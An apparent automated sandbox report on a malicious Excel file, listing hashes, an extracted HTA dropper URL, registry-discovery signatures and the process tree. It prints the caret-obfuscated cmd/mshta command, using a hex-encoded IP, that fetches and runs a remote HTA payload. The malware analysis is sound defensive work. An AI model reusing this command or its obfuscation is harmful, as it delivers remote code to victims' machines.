d0a26875a97931d0a1523e200c577ab70bd846e2c39a7708e6e02ddb176a6bd2

General

Target

d0a26875a97931d0a1523e200c577ab70bd846e2c39a7708e6e02ddb176a6bd2.xls
Size

102KB
MD5

cb5bbc7f560ba2f7d3650d6e140d843f
SHA1

b577a5bf0b48bfc6a08cb0a7485e373a13ee5d5b
SHA256

d0a26875a97931d0a1523e200c577ab70bd846e2c39a7708e6e02ddb176a6bd2
SHA512

4151989e65fbcf08f9e46328af242a6afc0c670b82e61a1466443a9fda264aae1d556be878a3a29675db10f357d9421a57097de58cae34802bad88c347e56d69
SSDEEP

3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://185.7.214.7/fer/fe3.html

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4640	1628	cmd.exe	82

Blocklisted process makes network request 1 IoCs

flow	pid	Process
21	4172	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1628	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE
1628	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 4640	1628	EXCEL.EXE	87
PID 1628 wrote to memory of 4640	1628	EXCEL.EXE	87
PID 4640 wrote to memory of 4172	4640	cmd.exe	89
PID 4640 wrote to memory of 4172	4640	cmd.exe	89

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d0a26875a97931d0a1523e200c577ab70bd846e2c39a7708e6e02ddb176a6bd2.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\system32\mshta.exe
    mshta http://0xb907d607/fer/fe3.html
    3⤵
    - Blocklisted process makes network request
    PID:4172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
0f9d2c5b48571360d7cef62c0648101d

SHA1
4823221a72027bfdf3d74e59afd80059f4ffc933

SHA256
7f2c03b4aa5a16ec9aa6c405576673578a113919ce90e8b969a2a2a17e7fd85e

SHA512
d2d810df7a178caa4c500eb04fa4fef2b9157a6c9acc05a48cc8f58a10e32b1e71f7e2839703923bca8b62e13c4a80f2ac85674e3bf1f6ccef0fcfa9133b582e

Download Submit
memory/1628-14-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-7-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-4-0x00007FFF04D10000-0x00007FFF04D20000-memory.dmp

Filesize
64KB

Download
memory/1628-3-0x00007FFF04D10000-0x00007FFF04D20000-memory.dmp

Filesize
64KB

Download
memory/1628-6-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-8-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-10-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-15-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-0-0x00007FFF04D10000-0x00007FFF04D20000-memory.dmp

Filesize
64KB

Download
memory/1628-11-0x00007FFF025D0000-0x00007FFF025E0000-memory.dmp

Filesize
64KB

Download
memory/1628-1-0x00007FFF44D2D000-0x00007FFF44D2E000-memory.dmp

Filesize
4KB

Download
memory/1628-5-0x00007FFF04D10000-0x00007FFF04D20000-memory.dmp

Filesize
64KB

Download
memory/1628-9-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-13-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-16-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-18-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-19-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-17-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-12-0x00007FFF025D0000-0x00007FFF025E0000-memory.dmp

Filesize
64KB

Download
memory/1628-30-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-31-0x00007FFF44D2D000-0x00007FFF44D2E000-memory.dmp

Filesize
4KB

Download
memory/1628-35-0x00007FFF44C90000-0x00007FFF44E85000-memory.dmp

Filesize
2.0MB

Download
memory/1628-2-0x00007FFF04D10000-0x00007FFF04D20000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads